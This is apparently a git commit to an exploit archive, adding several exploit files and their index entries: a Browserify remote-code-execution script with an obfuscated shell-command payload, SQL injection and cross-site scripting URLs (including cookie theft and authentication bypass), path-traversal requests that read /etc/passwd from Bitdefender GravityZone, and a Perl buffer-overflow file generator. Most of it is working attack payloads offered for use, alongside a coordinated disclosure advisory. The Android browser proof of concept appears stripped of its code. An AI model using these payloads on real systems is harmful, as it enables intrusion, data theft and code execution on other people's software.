From bb76fb3805fa11da9a0fdf6e348154f7858df6ed Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Fri, 18 Jul 2014 04:40:01 +0000 Subject: [PATCH] Updated 07_18_2014 --- files.csv | 10 ++ platforms/android/remote/34088.html | 72 ++++++++++++ platforms/jsp/webapps/34092.txt | 9 ++ platforms/linux/webapps/34086.txt | 166 ++++++++++++++++++++++++++++ platforms/multiple/dos/34090.py | 43 +++++++ platforms/php/webapps/34087.txt | 51 +++++++++ platforms/php/webapps/34091.txt | 16 +++ platforms/php/webapps/34095.txt | 9 ++ platforms/php/webapps/34096.txt | 9 ++ platforms/php/webapps/34097.txt | 9 ++ platforms/windows/dos/34094.pl | 14 +++ 11 files changed, 408 insertions(+) create mode 100755 platforms/android/remote/34088.html create mode 100755 platforms/jsp/webapps/34092.txt create mode 100755 platforms/linux/webapps/34086.txt create mode 100755 platforms/multiple/dos/34090.py create mode 100755 platforms/php/webapps/34087.txt create mode 100755 platforms/php/webapps/34091.txt create mode 100755 platforms/php/webapps/34095.txt create mode 100755 platforms/php/webapps/34096.txt create mode 100755 platforms/php/webapps/34097.txt create mode 100755 platforms/windows/dos/34094.pl diff --git a/files.csv b/files.csv index 384f0c248..25d7c5851 100755 --- a/files.csv +++ b/files.csv @@ -30694,3 +30694,13 @@ id,file,description,date,author,platform,type,port 34083,platforms/php/webapps/34083.txt,"Western Digital My Book World Edition 1.1.16 'lang' Parameter Cross-Site Scripting Vulnerabilities",2009-12-30,emgent,php,webapps,0 34084,platforms/php/webapps/34084.txt,"L2Web LineWeb 1.0.5 Multiple Input Validation Vulnerabilities",2010-01-06,"Ignacio Garrido",php,webapps,0 34085,platforms/php/webapps/34085.txt,"Gigya Socialize Plugin 1.0/1.1.x for Wordpress Cross Site Scripting Vulnerability",2010-06-04,MustLive,php,webapps,0 +34086,platforms/linux/webapps/34086.txt,"Bitdefender GravityZone 5.1.5.386 - Multiple Vulnerabilities",2014-07-16,"SEC Consult",linux,webapps,443 +34087,platforms/php/webapps/34087.txt,"Joomla Youtube Gallery Component - SQL Injection Vulnerability",2014-07-16,"Pham Van Khanh",php,webapps,80 +34088,platforms/android/remote/34088.html,"Boat Browser 8.0 and 8.0.1 - Remote Code Execution Vulnerability",2014-07-16,c0otlass,android,remote,0 +34090,platforms/multiple/dos/34090.py,"Node Browserify 4.2.0 - Remote Code Execution Vulnerability",2014-07-16,"Cal Leeming",multiple,dos,0 +34091,platforms/php/webapps/34091.txt,"Pay Per Minute Video Chat Script 2.x SQL Injection and Multiple Cross Site Scripting Vulnerabilities",2010-01-04,R3d-D3V!L,php,webapps,0 +34092,platforms/jsp/webapps/34092.txt,"JForum 2.1.8 'bookmarks' Module Multiple HTML Injection Vulnerabilities",2010-06-06,"Adam Baldwin",jsp,webapps,0 +34094,platforms/windows/dos/34094.pl,"Aqua Real Screensaver '.ar' File Buffer Overflow Vulnerability",2010-01-15,R3d-D3V!L,windows,dos,0 +34095,platforms/php/webapps/34095.txt,"PonVFTP 'login.php' SQL Injection Vulnerability",2010-01-15,S2K9,php,webapps,0 +34096,platforms/php/webapps/34096.txt,"CuteSITE CMS 1.x manage/add_user.php user_id Parameter SQL Injection",2010-06-06,"High-Tech Bridge SA",php,webapps,0 +34097,platforms/php/webapps/34097.txt,"CuteSITE CMS 1.x manage/main.php fld_path Parameter XSS",2010-06-06,"High-Tech Bridge SA",php,webapps,0 diff --git a/platforms/android/remote/34088.html b/platforms/android/remote/34088.html new file mode 100755 index 000000000..571ad1e11 --- /dev/null +++ b/platforms/android/remote/34088.html @@ -0,0 +1,72 @@ + + + + + +CreatMalTxt POC - WebView + + + +

CreatMalTxt POC

+ +
+ + + + \ No newline at end of file diff --git a/platforms/jsp/webapps/34092.txt b/platforms/jsp/webapps/34092.txt new file mode 100755 index 000000000..7f5eb0c66 --- /dev/null +++ b/platforms/jsp/webapps/34092.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40600/info + +JForum is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input before using it in dynamically generated content. + +Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible. + +JForum 2.1.8 is vulnerable; other versions may also be affected. + +https://www.example.com/forum/bookmarks/insert/2/1.page?action=insertSave&description=&module=bookmarks&relation_id=1&relation_type=2&title=&visible=1 \ No newline at end of file diff --git a/platforms/linux/webapps/34086.txt b/platforms/linux/webapps/34086.txt new file mode 100755 index 000000000..ac1741649 --- /dev/null +++ b/platforms/linux/webapps/34086.txt @@ -0,0 +1,166 @@ +SEC Consult Vulnerability Lab Security Advisory < 20140716-3 > +======================================================================= + title: Multiple critical vulnerabilities + product: Bitdefender GravityZone + vulnerable version: <5.1.11.432 + fixed version: >=5.1.11.432 + impact: critical + homepage: http://www.bitdefender.com + found: 2014-05-22 + by: Stefan Viehböck + SEC Consult Vulnerability Lab + https://www.sec-consult.com +======================================================================= + +Vendor description: +------------------- +Bitdefender GravityZone lets enterprises control and protect the heterogeneous +environments of today. The solution combines highly optimized virtualization +aware security with leading detection technologies and a fresh, but proven, +architecture. It empowers administrators with features adapted to reduce the +daily security hassle and eliminate the need for point solutions with unified +protection across virtualized, physical, and mobile endpoints. Unlike other +solutions that bolt-on modules to an aging architecture, the GravityZone +Control Center dashboard has been designed specifically to unify monitoring +and security management in a single simple and accessible interface. + +Source: http://download.bitdefender.com/resources/media/materials/business/en/datasheet-gravityzone-brief.pdf + + +Business recommendation: +------------------------ +Attackers are able to completely compromise the Bitdefender GravityZone +solution as they can gain system and database level access. +Furthermore attackers can manage all endpoints. + +The Bitdefender GravityZone can be used as an entry point into the target +infrastructure (lateral movement, privilege escalation). + +It is highly recommended by SEC Consult not to use this software until a +thorough security review has been performed by security professionals and all +identified issues have been resolved. + + +Vulnerability overview/description: +----------------------------------- +1) Unauthenticated local file disclosure (Web Console, Update Server) +Unauthenticated users can read arbitrary files from the filesystem with the +privileges of the "nginx" operating system user. These files include +configuration files containing sensitive information such as clear text +passwords which can be used in further attacks. + +Separate vulnerabilities affecting both Web Console and Update Server were +found. + + +2) Insecure service configuration / design issues +The MongoDB database which is offered via the network by default (TCP ports +27017, 28017) can be accessed using hardcoded credentials which can't be +changed. The overall system design requires the database to be accessible via +the network. +All relevant GravityZone configuration data can be accessed and changed. This +includes the user table. + +Excerpt from the documentation describing the TCP port 27017: +"Default port used by the Communication Server and Control Center to access +the Database." + + +3) Missing authentication +Authentication is not required for certain scripts in the web UI. This +allows unauthenticated attackers to execute administrative functions without +prior authentication. + + +Proof of concept: +----------------- +1) Unauthenticated local file disclosure (Web Console, Update Server) +Arbitrary files can be downloaded via a vulnerable script: +https:///webservice/CORE/downloadFullKitEpc/a/1?id=../../../../../etc/passwd + +The Update Server is vulnerable to local file disclosure as well. Arbitrary +files can be downloaded using the following HTTP request: + +GET /%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1 +Host: :7074 + +2) Insecure service configuration / Design issues +Attackers can connect to MongoDB on TCP ports 27017 and 28017 using the +following hardcoded credentials: +Username: +Password: + +Detailed proof of concept exploits have been removed for this vulnerability. + +3) Missing authentication +Authentication is not required for the following script: +/webservice/CORE/downloadSignedCsr (Unauthenticated certificate upload) + + + +Vulnerable / tested versions: +----------------------------- +The vulnerabilities have been verified to exist in GravityZone 5.1.5.386, +which was the most recent version at the time of discovery. + + + +Vendor contact timeline: +------------------------ +2014-05-26: Sending responsible disclosure policy and requesting encryption + keys. +2014-05-26: Vendor responds providing encryption keys. +2014-05-26: Sending advisory and proof of concept exploit via encrypted + channel. +2014-05-26: Vendor confirms receipt. +2014-06-04: Requesting status update. +2014-06-14: Vendor provides status update. Update will be released "End of + June". +2014-06-26: Vendor provides status update. Update for issue #1 and #3 will + be released June 30. Update for issue #2 will be released at the + end of July. +2014-06-27: Requesting info about other affected products. Clarifying + disclosure of issue #2. +2014-07-09: Vendor confirms that update for issue #1 and #3 has been shipped + and KB article for issue #2 will be released. +2014-07-15: Requesting version numbers of affected products. +2014-07-16: SEC Consult releases coordinated security advisory. + + + +Solution: +--------- +Update to a more recent version of Bitdefender GravityZone _and_ +implement mitigations for the issue #2. + +More information can be found at: +http://www.bitdefender.com/support/how-to-configure-iptables-firewall-rules-on-gravityzone-for-restricting-outside-access-to-mongodatabase-1265.html + + +Workaround: +----------- +No workaround available. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +SEC Consult Vulnerability Lab + +SEC Consult +Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius + +Headquarter: +Mooslackengasse 17, 1190 Vienna, Austria +Phone: +43 1 8903043 0 +Fax: +43 1 8903043 15 + +Mail: research at sec-consult dot com +Web: https://www.sec-consult.com +Blog: http://blog.sec-consult.com +Twitter: https://twitter.com/sec_consult + +EOF Stefan Viehböck / @2014 \ No newline at end of file diff --git a/platforms/multiple/dos/34090.py b/platforms/multiple/dos/34090.py new file mode 100755 index 000000000..b4e15e5f7 --- /dev/null +++ b/platforms/multiple/dos/34090.py @@ -0,0 +1,43 @@ +#!/usr/bin/python + +""" +Browserify POC exploit + +http://iops.io/blog/browserify-rce-vulnerability/ + +To run, just do: + +$ python poc.py > exploit.js +$ browserify exploit.js +BITCH I TOLD YOU THIS SHIT IS FABULOUS +[[garbage output]] +},{}]},{},[1]) 00:08:32 up 12:29, 3 users, load average: 0.00, 0.02, 0.05 +uid=1001(foxx) gid=1001(foxx) groups=1001(foxx),27(sudo),105(fuse) + +You can also spawn() and create a connect back shell. + +Enjoy + +""" + +def charencode(string): + encoded='' + for char in string: + encoded=encoded+","+str(ord(char)) + return encoded[1:] + +plaintext = """ + var require = this.process.mainModule.require; + var sys = require('sys') + var exec = require('child_process').exec; + function puts(error, stdout, stderr) { sys.puts(stdout) } + exec("uptime && id", puts); + console.log("BITCH I TOLD YOU THIS SHIT IS FABULOUS"); +""" + +payload = charencode(plaintext) +final = "eval(String.fromCharCode(%s));" %(payload) + +print "});" +print final +print "(function(){" \ No newline at end of file diff --git a/platforms/php/webapps/34087.txt b/platforms/php/webapps/34087.txt new file mode 100755 index 000000000..9ca14e854 --- /dev/null +++ b/platforms/php/webapps/34087.txt @@ -0,0 +1,51 @@ +# Exploit Title: Joomla component com_youtubegallery - SQL Injection +vulnerability +# Google Dork: inurl:index.php?option=com_youtubegallery +# Date: 15-07-2014 +# Exploit Author: Pham Van Khanh (phamvankhanhbka@gmail.com) +# Vendor Homepage: http://www.joomlaboat.com/youtube-gallery +# Software Link: http://www.joomlaboat.com/youtube-gallery +# Version: 4.x ( 3.x maybe) +# Tested on: newest version 4.1.7 on Joomla 1.5, 2.5, 3 +# CVE : CVE-2014-4960 + +Detail: +In line: 40, file: components\com_youtubegallery\models\gallery.php, +if parameter listid is int (or can cast to int), $listid and $themeid +will not santinized. +Source code: +40: if(JRequest::getInt('listid')) +41: { +42: //Shadow Box +43: $listid=JRequest::getVar('listid'); +44: +45: +46: //Get Theme +47: $m_themeid=(int)JRequest::getVar('mobilethemeid'); +48: if($m_themeid!=0) +49: { +50: if(YouTubeGalleryMisc::check_user_agent('mobile')) +51: $themeid=$m_themeid; +52: else +53: $themeid=JRequest::getVar('themeid'); +54: } +55: else +56: $themeid=JRequest::getVar('themeid'); +57: } +After, $themeid and $listid are used in line 86, 92. Two method +getVideoListTableRow and getThemeTableRow concat string to construct +sql query. So it is vulnerable to SQL Injection. +Source code: +86: if(!$this->misc->getVideoListTableRow($listid)) +87: { +88: echo '

No video found

'; +89: return false; +90: } +91: +92: if(!$this->misc->getThemeTableRow($themeid)) +93: { +94: echo '

No video found

'; +95: return false; +96: } + +# Site POF: http://server/index.php?option=com_youtubegallery&view=youtubegallery&listid=1&themeid=1'&videoid=ETMVUuFbToQ&tmpl=component&TB_iframe=true&height=500&width=700 diff --git a/platforms/php/webapps/34091.txt b/platforms/php/webapps/34091.txt new file mode 100755 index 000000000..f0bc52f9b --- /dev/null +++ b/platforms/php/webapps/34091.txt @@ -0,0 +1,16 @@ +source: http://www.securityfocus.com/bid/40585/info + +Pay Per Minute Video Chat Script is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Cross-site scripting: + +http://www.example.com/P47H/admin/memberviewdetails.php?id=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E + +http://www.example.com/P47H/videos.php?model=%3E%22%3E%3CScRiPt%20%0a%0d%3Ealert(666)%3B%3C/ScRiPt%3E + + +SQL-injection: + +http://www.example.com/P47H/index_ie.php?page=-666 diff --git a/platforms/php/webapps/34095.txt b/platforms/php/webapps/34095.txt new file mode 100755 index 000000000..4dbf7ba49 --- /dev/null +++ b/platforms/php/webapps/34095.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40608/info + +PonVFTP is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +The following example data is available: + +password: 'or' 1=1 \ No newline at end of file diff --git a/platforms/php/webapps/34096.txt b/platforms/php/webapps/34096.txt new file mode 100755 index 000000000..cabcded2a --- /dev/null +++ b/platforms/php/webapps/34096.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40612/info + +CuteSITE CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +CuteSITE CMS 1.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/manage/add_user.php?user_id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,user%28%29,15,16 \ No newline at end of file diff --git a/platforms/php/webapps/34097.txt b/platforms/php/webapps/34097.txt new file mode 100755 index 000000000..5e24c62ef --- /dev/null +++ b/platforms/php/webapps/34097.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40612/info + +CuteSITE CMS is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied input. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +CuteSITE CMS 1.5.0 is vulnerable; prior versions may also be affected. + +http://www.example.com/manage/main.php?fld_path=XXX%3Cscript%3Ealert%28document.cookie%29%3C/script%3E \ No newline at end of file diff --git a/platforms/windows/dos/34094.pl b/platforms/windows/dos/34094.pl new file mode 100755 index 000000000..29292fb5f --- /dev/null +++ b/platforms/windows/dos/34094.pl @@ -0,0 +1,14 @@ +source: http://www.securityfocus.com/bid/40606/info + +Aqua Real Screensaver is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. + +Successfully exploiting this issue may allow remote attackers to execute arbitrary code in the context of the vulnerable application. Failed attacks will cause denial-of-service conditions. + +Aqua Real 1 and 2 are vulnerable; other versions may also be affected. + +#!c/perl/bin/ +my $file= "Crash.ar"; +my $boom="\x41" x 5000; +open(myfile,'>>Crash.ar') || die "Cannot Creat file\n\n"; +print myfile $boom; +print "Done..!~#\n"; \ No newline at end of file